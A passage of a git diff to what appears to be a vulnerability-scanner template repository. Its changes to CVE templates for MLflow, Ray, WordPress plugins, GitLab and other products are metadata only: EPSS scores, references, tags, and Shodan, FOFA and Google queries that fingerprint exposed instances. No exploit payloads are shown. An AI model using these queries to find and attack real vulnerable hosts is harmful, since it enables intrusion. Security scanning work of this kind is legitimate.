fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,oss,rce,intrusive variables: model_name: "{{rand_text_alpha(6)}}" diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml index d88f9a08ae..9951ee6eab 100644 --- a/http/cves/2023/CVE-2023-6020.yaml +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-6020 cwe-id: CWE-862 epss-score: 0.06351 - epss-percentile: 0.9349 + epss-percentile: 0.93636 cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:* metadata: verified: true @@ -23,6 +23,7 @@ info: vendor: ray_project product: ray shodan-query: http.favicon.hash:463802404 + fofa-query: body="ray dashboard" tags: cve2023,cve,lfi,ray,oos,ray_project http: diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml index 1ffb9b62e9..0323e7dc80 100644 --- a/http/cves/2023/CVE-2023-6021.yaml +++ b/http/cves/2023/CVE-2023-6021.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-6021 cwe-id: CWE-22,CWE-29 epss-score: 0.0038 - epss-percentile: 0.72442 + epss-percentile: 0.72895 cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:* metadata: verified: true @@ -23,6 +23,7 @@ info: vendor: ray_project product: ray shodan-query: html:"Ray Dashboard" + fofa-query: body="ray dashboard" tags: cve,cve2023,lfi,ray,oos,ray_project http: diff --git a/http/cves/2023/CVE-2023-6023.yaml b/http/cves/2023/CVE-2023-6023.yaml index e9e4cb741d..d1cde882d8 100644 --- a/http/cves/2023/CVE-2023-6023.yaml +++ b/http/cves/2023/CVE-2023-6023.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-6023 cwe-id: CWE-22,CWE-29 epss-score: 0.003 - epss-percentile: 0.68895 + epss-percentile: 0.69472 cpe: cpe:2.3:a:vertaai:modeldb:-:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: vertaai product: modeldb shodan-query: http.favicon.hash:-2097033750 + fofa-query: icon_hash=-2097033750 + google-query: intitle:"verta ai" zoomeye-query: title:"Verta AI" tags: cve,cve2023,lfi,modeldb diff --git a/http/cves/2023/CVE-2023-6038.yaml b/http/cves/2023/CVE-2023-6038.yaml index 2b80f785df..d2d3ca90d1 100644 --- a/http/cves/2023/CVE-2023-6038.yaml +++ b/http/cves/2023/CVE-2023-6038.yaml @@ -14,9 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-6038 - cwe-id: CWE-862,CWE-29 - epss-score: 0.05392 - epss-percentile: 0.92391 + cwe-id: CWE-862 + epss-score: 0.06351 + epss-percentile: 0.93636 cpe: cpe:2.3:a:h2o:h2o:-:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: h2o product: h2o shodan-query: title:"H2O Flow" + fofa-query: title="h2o flow" + google-query: intitle:"h2o flow" tags: cve,cve2023,h2o-3,h2o,ml http: diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 57281bd29f..7bf2365ff1 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -19,13 +19,15 @@ info: cve-id: CVE-2023-6063 cwe-id: CWE-89 epss-score: 0.02974 - epss-percentile: 0.9065 + epss-percentile: 0.90865 cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: wpfastestcache product: wp_fastest_cache framework: wordpress + shodan-query: http.html:/wp-content/plugins/wp-fastest-cache/ + fofa-query: body=/wp-content/plugins/wp-fastest-cache/ publicwww-query: /wp-content/plugins/wp-fastest-cache/ tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index a5eee969f4..58107cd62a 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -15,8 +15,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-6065 - epss-score: 0.00046 - epss-percentile: 0.16199 + epss-score: 0.00146 + epss-percentile: 0.50461 cpe: cpe:2.3:a:quttera:quttera_web_malware_scanner:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml index a6f9c783c2..3eb7868174 100644 --- a/http/cves/2023/CVE-2023-6114.yaml +++ b/http/cves/2023/CVE-2023-6114.yaml @@ -17,14 +17,15 @@ info: cvss-score: 7.5 cve-id: CVE-2023-6114 cwe-id: CWE-552 - epss-score: 0.00145 - epss-percentile: 0.50326 + epss-score: 0.01646 + epss-percentile: 0.87553 cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:* metadata: max-request: 2 - product: duplicator vendor: awesomemotive + product: duplicator framework: wordpress + google-query: inurl:"/wp-content/plugins/duplicator" tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp http: diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml index e25f728e00..300106a47f 100644 --- a/http/cves/2023/CVE-2023-6360.yaml +++ b/http/cves/2023/CVE-2023-6360.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-6360 cwe-id: CWE-89 epss-score: 0.00832 - epss-percentile: 0.81644 + epss-percentile: 0.81991 cpe: cpe:2.3:a:joedolson:my_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml index d12adc333b..99d03e0b53 100644 --- a/http/cves/2023/CVE-2023-6379.yaml +++ b/http/cves/2023/CVE-2023-6379.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-6379 cwe-id: CWE-79 - epss-score: 0.00113 - epss-percentile: 0.44636 + epss-score: 0.00075 + epss-percentile: 0.32047 cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: alkacon product: opencms shodan-query: title:"opencms" + fofa-query: title="opencms" + google-query: intitle:"opencms" tags: cve2023,cve,opencms,xss,alkacon http: diff --git a/http/cves/2023/CVE-2023-6380.yaml b/http/cves/2023/CVE-2023-6380.yaml index f2fcf4b42d..6f23bea096 100644 --- a/http/cves/2023/CVE-2023-6380.yaml +++ b/http/cves/2023/CVE-2023-6380.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-6380 cwe-id: CWE-601 epss-score: 0.01158 - epss-percentile: 0.83366 + epss-percentile: 0.84838 cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: alkacon product: opencms shodan-query: "/opencms/" + fofa-query: title="opencms" + google-query: intitle:"opencms" tags: cve,cve2023,redirect,opencms http: diff --git a/http/cves/2023/CVE-2023-6389.yaml b/http/cves/2023/CVE-2023-6389.yaml index 74d9433cde..917e147152 100644 --- a/http/cves/2023/CVE-2023-6389.yaml +++ b/http/cves/2023/CVE-2023-6389.yaml @@ -22,8 +22,10 @@ info: max-request: 1 vendor: abhinavsingh product: wordpress_toolbar + shodan-query: http.html:/wp-content/plugins/wordpress-toolbar/ + fofa-query: body=/wp-content/plugins/wordpress-toolbar/ publicwww-query: "/wp-content/plugins/wordpress-toolbar/" - tags: cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect + tags: wpscan,cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect http: - method: GET diff --git a/http/cves/2023/CVE-2023-6553.yaml b/http/cves/2023/CVE-2023-6553.yaml index 400597e957..ebae9ddafd 100644 --- a/http/cves/2023/CVE-2023-6553.yaml +++ b/http/cves/2023/CVE-2023-6553.yaml @@ -24,9 +24,11 @@ info: vendor: backupbliss product: backup_migration framework: wordpress + shodan-query: http.html:/wp-content/plugins/backup-backup/ + fofa-query: body=/wp-content/plugins/backup-backup/ publicwww-query: /wp-content/plugins/backup-backup/ google-query: inurl:"/wp-content/plugins/backup-backup/" - tags: cve,cve2023,wp-plugin,rce,unauth,wordpress,wp + tags: packetstorm,cve,cve2023,wp-plugin,rce,unauth,wordpress,wp flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index a6e2943d61..5a9ad442ae 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -27,6 +27,8 @@ info: vendor: thimpress product: learnpress framework: wordpress + shodan-query: http.html:/wp-content/plugins/learnpress + fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml index f6dabde295..f8a50523ce 100644 --- a/http/cves/2023/CVE-2023-6623.yaml +++ b/http/cves/2023/CVE-2023-6623.yaml @@ -28,6 +28,8 @@ info: vendor: wpdeveloper product: essential_blocks framework: wordpress + shodan-query: http.html:/wp-content/plugins/essential-blocks/ + fofa-query: body=/wp-content/plugins/essential-blocks/ publicwww-query: "/wp-content/plugins/essential-blocks/" tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi diff --git a/http/cves/2023/CVE-2023-6634.yaml b/http/cves/2023/CVE-2023-6634.yaml index bcfcddafca..3ca99e2e70 100644 --- a/http/cves/2023/CVE-2023-6634.yaml +++ b/http/cves/2023/CVE-2023-6634.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-6634 cwe-id: CWE-77 - epss-score: 0.16476 - epss-percentile: 0.95874 + epss-score: 0.18881 + epss-percentile: 0.9624 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: thimpress product: learnpress framework: wordpress + shodan-query: http.html:/wp-content/plugins/learnpress + fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,learnpress,rce,intrusive variables: diff --git a/http/cves/2023/CVE-2023-6831.yaml b/http/cves/2023/CVE-2023-6831.yaml index c20de4ecb6..c61efb18c2 100644 --- a/http/cves/2023/CVE-2023-6831.yaml +++ b/http/cves/2023/CVE-2023-6831.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H cvss-score: 8.1 cve-id: CVE-2023-6831 - cwe-id: CWE-22 - epss-score: 0.00046 - epss-percentile: 0.12693 + cwe-id: CWE-22,CWE-29 + epss-score: 0.00207 + epss-percentile: 0.58698 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: lfprojects product: mlflow shodan-query: "http.title:\"mlflow\"" + fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,pathtraversal,lfprojects,intrusive http: diff --git a/http/cves/2023/CVE-2023-6875.yaml b/http/cves/2023/CVE-2023-6875.yaml index 5bfecacd98..112b394224 100644 --- a/http/cves/2023/CVE-2023-6875.yaml +++ b/http/cves/2023/CVE-2023-6875.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-6875 cwe-id: CWE-862 - epss-score: 0.04263 - epss-percentile: 0.92089 + epss-score: 0.05153 + epss-percentile: 0.92961 cpe: cpe:2.3:a:wpexperts:post_smtp_mailer:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: wpexperts product: post_smtp_mailer framework: wordpress + shodan-query: http.html:/wp-content/plugins/post-smtp + fofa-query: body=/wp-content/plugins/post-smtp publicwww-query: "/wp-content/plugins/post-smtp" tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass variables: diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index 034e26941e..d235fb2d48 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -9,19 +9,23 @@ info: reference: - https://vuldb.com/?ctiid.248254 - https://vuldb.com/?id.248254 + - https://github.com/tanjiti/sec_profile + - https://github.com/wy876/POC + - https://github.com/xingchennb/POC- classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-6895 cwe-id: CWE-78 - epss-score: 0.0008 - epss-percentile: 0.33389 + epss-score: 0.89707 + epss-percentile: 0.9876 cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: hikvision product: intercom_broadcast_system + shodan-query: http.favicon.hash:"-1830859634" fofa-query: "icon_hash=\"-1830859634\"" tags: cve,cve2023,hikvision,rce diff --git a/http/cves/2023/CVE-2023-6909.yaml b/http/cves/2023/CVE-2023-6909.yaml index fe4e77c554..0a9d5b0090 100644 --- a/http/cves/2023/CVE-2023-6909.yaml +++ b/http/cves/2023/CVE-2023-6909.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-6909 cwe-id: CWE-29 - epss-score: 0.00409 - epss-percentile: 0.73387 + epss-score: 0.00494 + epss-percentile: 0.76167 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: lfprojects product: mlflow shodan-query: "http.title:\"mlflow\"" + fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,lfi,intrusive http: diff --git a/http/cves/2023/CVE-2023-6977.yaml b/http/cves/2023/CVE-2023-6977.yaml index 2eb799cbbc..ad82399438 100644 --- a/http/cves/2023/CVE-2023-6977.yaml +++ b/http/cves/2023/CVE-2023-6977.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-6977 cwe-id: CWE-29 - epss-score: 0.00409 - epss-percentile: 0.73387 + epss-score: 0.00494 + epss-percentile: 0.76167 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" + fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,oss,lfi,intrusive,lfprojects http: diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml index 9551426c51..802578849e 100644 --- a/http/cves/2023/CVE-2023-6989.yaml +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -9,13 +9,14 @@ info: reference: - https://wpscan.com/vulnerability/a485aee7-39a0-418c-9699-9afc53e28f55/ - https://nvd.nist.gov/vuln/detail/CVE-2023-6989 + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-6989 cwe-id: CWE-22 - epss-score: 0.00282 - epss-percentile: 0.68187 + epss-score: 0.11562 + epss-percentile: 0.95251 cpe: cpe:2.3:a:getshieldsecurity:shield_security:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -23,8 +24,10 @@ info: vendor: getshieldsecurity product: shield_security framework: wordpress + shodan-query: http.html:/wp-content/plugins/wp-simple-firewall + fofa-query: body=/wp-content/plugins/wp-simple-firewall publicwww-query: "/wp-content/plugins/wp-simple-firewall" - tags: cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security + tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security http: - raw: diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index 221abe6746..80f92e14eb 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -3,7 +3,7 @@ id: CVE-2023-7028 info: name: GitLab - Account Takeover via Password Reset author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch - severity: critical + severity: high description: | An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address. reference: @@ -11,19 +11,24 @@ info: - https://x.com/rwincey/status/1745659710089437368?s=20 - https://gitlab.com/gitlab-org/gitlab/-/issues/436084 - https://hackerone.com/reports/2293343 + - https://github.com/V1lu0/CVE-2023-7028 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N - cvss-score: 10 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2023-7028 - cwe-id: CWE-284 + cwe-id: CWE-640,CWE-284 + epss-score: 0.95952 + epss-percentile: 0.99464 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: verified: true max-request: 6 vendor: gitlab product: gitlab shodan-query: title:"Gitlab" - tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive - + fofa-query: title="gitlab" + google-query: intitle:"gitlab" + tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 0d421f8fc1..07766fd74e 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -10,13 +10,15 @@ info: - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md - https://vuldb.com/?id.249510 - https://nvd.nist.gov/vuln/detail/CVE-2024-0195 + - https://vuldb.com/?ctiid.249510 + - https://github.com/Tropinene/Yscanner classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-0195 cwe-id: CWE-94 - epss-score: 0.00107 - epss-percentile: 0.43423 + epss-score: 0.89846 + epss-percentile: 0.98769 cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +27,6 @@ info: product: spider-flow fofa-query: app="SpiderFlow" tags: cve,cve2024,spiderflow,crawler,unauth,rce - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index da0e5881ed..c4ccc716c1 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -17,17 +17,16 @@ info: cvss-score: 9.8 cve-id: CVE-2024-0200 cwe-id: CWE-470 - epss-score: 0.0037 - epss-percentile: 0.72517 + epss-score: 0.06844 + epss-percentile: 0.93885 cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* metadata: + verified: true vendor: github product: enterprise_server shodan-query: title:"GitHub Enterprise" fofa-query: app="Github-Enterprise" - verified: true tags: cve,cve2024,rce,github,enterprise - variables: username: "{{username}}" password: "{{password}}" diff --git a/http/cves/2024/CVE-2024-0204.yaml b/http/cves/2024/CVE-2024-0204.yaml index c32fd0979b..e115c0cad5 100644 --- a/http/cves/2024/CVE-2024-0204.yaml +++ b/http/cves/2024/CVE-2024-0204.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.favicon.hash:1484947000,1828756398,1170495932 fofa-query: app="GoAnywhere-MFT" zoomeye-query: app:"Fortra GoAnywhere-MFT" - tags: cve,cve2024,auth-bypass,goanywhere + tags: packetstorm,cve,cve2024,auth-bypass,goanywhere http: - method: GET diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml index 27b99e3c20..9cc96e8257 100644 --- a/http/cves/2024/CVE-2024-0235.yaml +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -29,6 +29,7 @@ info: shodan-query: vuln:CVE-2023-2796 fofa-query: wp-content/plugins/eventon/ publicwww-query: "/wp-content/plugins/eventon/" + google-query: inurl:"/wp-content/plugins/eventon/" tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan http: diff --git a/http/cves/2024/CVE-2024-0305.yaml b/http/cves/2024/CVE-2024-0305.yaml index 9305b5e307..bc5222aad8 100644 --- a/http/cves/2024/CVE-2024-0305.yaml +++ b/http/cves/2024/CVE-2024-0305.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-0305 - epss-score: 0.00796 - epss-percentile: 0.81232 + epss-score: 0.00947 + epss-percentile: 0.83122 cpe: cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: product: ncast fofa-query: app="Ncast-产品" && title=="高清智能录播系统" zoomeye-query: title:"高清智能录播系统" + shodan-query: http.title:"高清智能录播系统" + google-query: intitle:"高清智能录播系统" tags: cve,cve2024,ncast,rce http: diff --git a/http/cves/2024/CVE-2024-0337.yaml b/http/cves/2024/CVE-2024-0337.yaml index 71b6600db2..285109fd1a 100644 --- a/http/cves/2024/CVE-2024-0337.yaml +++ b/http/cves/2024/CVE-2024-0337.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 publicwww-query: inurl:"/wp-content/plugins/travelpayouts" - tags: cve,cve2024,wp,wp-plugin,wordpress,redirect,travelpayouts + tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,redirect,travelpayouts http: - method: GET diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml index 3452a1685d..32c906a6af 100644 --- a/http/cves/2024/CVE-2024-0352.yaml +++ b/http/cves/2024/CVE-2024-0352.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-0352 cwe-id: CWE-434 - epss-score: 0.01029 - epss-percentile: 0.82231 + epss-score: 0.0086 + epss-percentile: 0.82263 cpe: cpe:2.3:a:likeshop:likeshop:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: likeshop product: likeshop shodan-query: http.favicon.hash:874152924 + fofa-query: icon_hash=874152924 tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2024/CVE-2024-0713.yaml b/http/cves/2024/CVE-2024-0713.yaml index 67a8072a14..267c293698 100644 --- a/http/cves/2024/CVE-2024-0713.yaml +++ b/http/cves/2024/CVE-2024-0713.yaml @@ -24,6 +24,7 @@ info: vendor: monitorr product: monitorr fofa-query: "icon_hash=\"-211006074\"" + shodan-query: http.favicon.hash:"-211006074" tags: cve,cve2024,file-upload,intrusive,monitorr variables: file: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index d6858b9ce0..3bc25fe99d 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -30,6 +30,7 @@ info: vendor: ruifang-tech product: rebuild fofa-query: "icon_hash=\"871154672\"" + shodan-query: http.favicon.hash:"871154672" tags: cve2024,cve,rebuild,ssrf http: diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index 82c83ee6c6..efac84fdae 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-1071 cwe-id: CWE-89 epss-score: 0.00063 - epss-percentile: 0.24988 + epss-percentile: 0.26569 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-1208.yaml b/http/cves/2024/CVE-2024-1208.yaml index ba10347dd8..d06d7ed936 100644 --- a/http/cves/2024/CVE-2024-1208.yaml +++ b/http/cves/2024/CVE-2024-1208.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-1208 - epss-score: 0.01024 - epss-percentile: 0.83462 + epss-score: 0.01217 + epss-percentile: 0.85275 cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/sfwd-lms" google-query: inurl:"/wp-content/plugins/sfwd-lms" + shodan-query: http.html:/wp-content/plugins/sfwd-lms + fofa-query: body=/wp-content/plugins/sfwd-lms tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: diff --git a/http/cves/2024/CVE-2024-1209.yaml b/http/cves/2024/CVE-2024-1209.yaml index dc369cfd47..46e4d49b37 100644 --- a/http/cves/2024/CVE-2024-1209.yaml +++ b/http/cves/2024/CVE-2024-1209.yaml @@ -11,10 +11,14 @@ info: - https://wpscan.com/vulnerability/f813a21d-7a6a-4ff4-a43c-3e2991a23c7f/ - https://github.com/karlemilnikka/CVE-2024-1209 - https://nvd.nist.gov/vuln/detail/CVE-2024-1209 + - https://www.learndash.com/release-notes/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-1209 + epss-score: 0.01199 + epss-percentile: 0.85131 cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +28,8 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/sfwd-lms" google-query: inurl:"/wp-content/plugins/sfwd-lms" + shodan-query: http.html:/wp-content/plugins/sfwd-lms + fofa-query: body=/wp-content/plugins/sfwd-lms tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: diff --git a/http/cves/2024/CVE-2024-1210.yaml b/http/cves/2024/CVE-2024-1210.yaml index 9c975befa1..77adf5117c 100644 --- a/http/cves/2024/CVE-2024-1210.yaml +++ b/http/cves/2024/CVE-2024-1210.yaml @@ -11,10 +11,14 @@ info: - https://wpscan.com/vulnerability/f4b12179-3112-465a-97e1-314721f7fe3d/ - https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210 - https://nvd.nist.gov/vuln/detail/CVE-2024-1210 + - https://www.learndash.com/release-notes/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/61ca5ab6-5fe9-4313-9b0d-8736663d0e89?source=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-1210 + epss-score: 0.01199 + epss-percentile: 0.85131 cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +28,8 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/sfwd-lms" google-query: inurl:"/wp-content/plugins/sfwd-lms" + shodan-query: http.html:/wp-content/plugins/sfwd-lms + fofa-query: body=/wp-content/plugins/sfwd-lms tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index c46073a3cb..890f315b5a 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -15,19 +15,19 @@ info: - https://github.com/DiabloHTB/CVE-2024-1561 - https://nvd.nist.gov/vuln/detail/CVE-2024-1561 - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2 + - https://www.gradio.app/changelog#4-13-0 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-1561 cwe-id: CWE-29 - epss-score: 0.00045 - epss-percentile: 0.14639 + epss-score: 0.00087 + epss-percentile: 0.36659 metadata: verified: true max-request: 3 shodan-query: html:"__gradio_mode__" tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr - flow: http(1) && http(2) && http(3) http: diff --git a/http/cves/2024/CVE-2024-1709.yaml b/http/cves/2024/CVE-2024-1709.yaml index 8b034b70f7..0b166ee532 100644 --- a/http/cves/2024/CVE-2024-1709.yaml +++ b/http/cves/2024/CVE-2024-1709.yaml @@ -11,11 +11,15 @@ info: - https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 - https://nvd.nist.gov/vuln/detail/CVE-2024-1709 + - https://github.com/rapid7/metasploit-framework/pull/18870 classification: cvss-metrics: 